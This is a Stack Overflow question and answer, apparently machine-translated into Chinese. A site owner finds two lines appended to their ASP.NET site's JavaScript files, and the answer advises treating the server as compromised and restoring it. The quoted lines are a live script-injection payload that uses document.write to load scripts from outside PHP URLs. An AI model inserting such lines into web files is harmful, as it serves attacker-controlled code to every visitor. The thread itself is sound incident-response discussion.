我需要知道是否有任何方法可以将附加代码写入已部署在服务器上的 JavaScript 文件。
我遇到了 ASP.NET 2.0 网站的问题,它与我在某些页面上的 JavaScript 文件有关。问题是,当我将 JavaScript 文件与其他文件一起上传时,它工作正常,但一段时间后(一两天)JavaScript 文件发生更改,并且在每个文件的底部添加了两行。这两行是这样的:
document.write('<script src=http://kingsoftus.com/App_Code/tsx2.php ><\/script>');
document.write('<script src=http://eco-battery.co.uk/images/battguide.php ><\/script>');
这导致我的 aspx 页面从这些未知的 url 加载一些东西。这件事会导致错误,aspx 页面无法加载或加载时出错。我怀疑服务器上有问题,但我需要知道是否有人(病毒或黑客)可以将这两行添加到服务器上的任何 JavaScript 文件中。
最佳答案
您的服务器受到威胁。添加的链接指向带有恶意软件标记的站点。最安全的方法是删除服务器并从备份中恢复。如果您不负责服务器维护,请尽快联系维护人员,并告知他们感染的消息。关闭服务器以避免感染访问您网站的人。
至于导致感染的原因,一些研究可能会提出您所看到的签名的具体细节。它可能是任何东西,从旧的、未打补丁的库到代码中的 XSS 漏洞,再到闪存驱动器受感染的粗心员工。
编辑:您在评论中说您不管理服务器。在提供商评估感染的同时,评估您的代码是否存在可能的漏洞。这是一篇 MSDN 文章(How To: Prevent Cross-Site Scripting in ASP.NET)。较早的 SO 问题 ( What should a developer know before building a public web site? ) 有一些涵盖安全方面的很好的答案。
关于.net - JavaScript 代码注入(inject)我的网站页面,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/1779823/